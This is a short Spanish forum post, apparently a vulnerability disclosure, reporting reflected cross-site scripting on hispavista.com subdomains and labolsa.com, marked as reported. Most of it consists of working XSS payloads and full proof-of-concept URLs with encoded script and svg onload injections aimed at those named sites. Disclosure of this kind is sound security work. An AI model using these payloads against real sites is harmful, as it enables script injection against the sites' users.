Buenas a todos.
Se trata de un XSS reflejado en TODOS los dominios de la empresa.
Para no publicar imágenes puesto a que son demasiados dejaré un par de ejemplos y el vector utilizado.
El vector será: "/><svg/onload=confirm(/Jimeno/.source);>
Estado: REPORTADOS
Unos ejemplos del fallo:
http://buscar.hispavista.com/?q=%22%2F%3E%3Csvg%2Fonload%3Dconfirm%280%29%3B%3E
http://buscar.hispavista.com/?q=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
labolsa.com/buscador/?cadenaBusqueda=""%3B<%2Fscript><script>alert(0)<%2Fscript><"&buscar=Buscar
http://turismo.hispavista.com/buscar/?q=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&Submit=Buscar+en+Turismo&cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
http://paginasamarillas.hispavista.com/index.phtml?cadena=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22&Submit=Buscar+en+P%E1g.+amarillas&oculto=SPAIN&str=%22%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E%3C%22
http://buscar.hispavista.com/?q=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E&Submit=Buscar
Hay muchos más, estos son unos ejemplos.
AFECTA A TODO EL SERVIDOR.
Saludos.